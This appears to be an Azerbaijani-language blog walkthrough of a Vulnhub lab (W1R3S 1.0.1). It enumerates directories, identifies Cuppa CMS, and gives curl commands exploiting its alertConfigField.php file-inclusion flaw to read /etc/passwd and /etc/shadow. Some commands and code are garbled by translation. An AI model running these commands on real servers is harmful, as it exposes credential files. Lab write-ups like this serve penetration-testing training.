Blackhat.az

Loading...

Blackhat.az

Register

Cyber Security - DataBase attacks - Hacking - Pentest - Information Gathering - Password cracking - Uncategorized @az - Web application - 16 February 2021

Cuppa CMS-Də Fayl Daxil Olma Zəifliyinin İstifadəsi

WEb tətbiqetmələrinin nüfuz sınaqları zamanı hədəf tətbiqindəki zəiflik səbəbi ilə gözlənilməz fayllar veb tətbiqetmə tərəfindən icra edilə bilər. Bu yazıda, edilməsi Fayl açığı ilə bağlı Cuppa CMS W1R3S: 1.0.1 virtual maşın istifadə olunacaq.

Məqalədə istifadə olunan W1R3S: 1.0.1 virtual maşını Vulnhub saytından yükləyə bilərsiniz .

https://www.vulnhub.com/entry/w1r3s-101,220/

Apache xidməti virtual maşının TCP \ 80 portunda işləyir .

http://192.168.106.129

Github- dakı dirsearch vasitəsi tətbiqdəki qovluqları tapmaq üçün istifadə edilə bilər.

git clone https://github.com/maurosoria/dirsearch.git

cd dirsearch

./dirsearch.py ​​-u http://192.168.106.129 -w /usr/share/dirb/wordlists/common.txt -e * -t 3

” Rekursiv ” seçim dərin araşdırma üçün dirsearch alətində də istifadə edilə bilər.

./dirsearch.py ​​-u http://192.168.106.129 -w /usr/share/dirb/wordlists/common.txt -e * -t 3 -r -R 4

Kəşf edilmiş ” administrator ” qovluğuna getdiyiniz zaman avtomatik olaraq ” quraşdırma ” qovluğuna yönəldilir.

whatweb http://192.168.106.129/administrator

Quraşdırma səhifəsində və ya “İrəli” düyməsinə vurulduqda Cuppa CMS-dən istifadə edildiyi görülür.

Cuppa CMS ilə əlaqəli zəifliklər araşdırıldıqda, LFI / RFI zəifliyi aşkar edildi.

searchsploit cuppa

searchsploit -m 25971

Zəiflik detalları araşdırıldıqda, alertConfigField.php sənədindəki nəzarətin olmamasının zəifliyə səbəb olduğu görülür .

Cuppa CMS-in mənbə kodu zəifliyi görmək üçün internetdən və ya virtual maşından əldə edilə bilər. Zəifliyin Cuppa CMS-in ən son versiyasında davam etdiyi görülür.

  • https://github.com/CuppaCMS/CuppaCMS
  • http://cuppacms.com/files/cuppa_cms.zip
  • http://192.168.106.129/cuppa_cms.zip

 

” AlertConfigField.php ” sənədinin 77-ci sətrində məlumatların müştəri tərəfindən birbaşa ” daxil ” funksiyasına göndərilə biləcəyi və server tərəfində heç bir nəzarət edilmədiyi görülür.

<div id = ”content_alert_config” class =
”content_alert_config ”> <? php daxildir “../components/table_manager/fields/config/eace.@$cuppa- > POST (” urlConfig ”); ?>
</div>

Zəiflikdən istifadə etmək üçün bir veb brauzerdən istifadə edildiyi zaman, gözlənildiyi kimi, ” qıvrım ” vasitəsi URL kodlaşdırmaqla istifadə edilə bilər , çünki cavab gözlənildiyi kimi alınmır .

curl -s –data-urlencode urlConfig = .. / .. / .. / .. / .. / .. / .. / .. / .. / etc /

passwd http://192.168.106.129/administrator/alerts /alertConfigField.php

| grep “class = \” content_alert_config \ ”” -A50

Oxşar əməliyyat / etc / shadow üçün edildikdə , faylın oxuna biləcəyi görülür.

curl -s –data-urlencode urlConfig = .. / .. / .. / .. / .. / .. / .. / .. / .. / etc /

shadow http://192.168.106.129/administrator/alerts /alertConfigField.php

| grep “class = \” content_alert_config \ ”” -A50 | grep -home “: \ *:”

Qeyd: Bu virtual maşın üzərində Cuppa CMS işləyən Apache tətbiqetmə istifadəçisinin ( www-data ) standart bir hesab olduğu görünür. Bununla birlikdə, bütün istifadəçilərin ( Hər kəsin / Başqalarının ) / etc / shadow faylının məzmununu oxumağa və yazmağa icazə verildiyi üçün , əməliyyat sistemindəki istifadəçilərin parol xülasələri ” www-data ” istifadəçisinin icazəsi ilə oxuna bilər. .

netstat -nlpt

ps -ef | grep 1488

qrupları www-data

ls -la / etc / shadow

Virtual maşında Cuppa CMS-nin konfiqurasiya faylı araşdırıldıqda, standart sənədlərin dəyişdirildiyi görülür.

cat Configuration.php | grep -i ‘$password’ -A3 -B3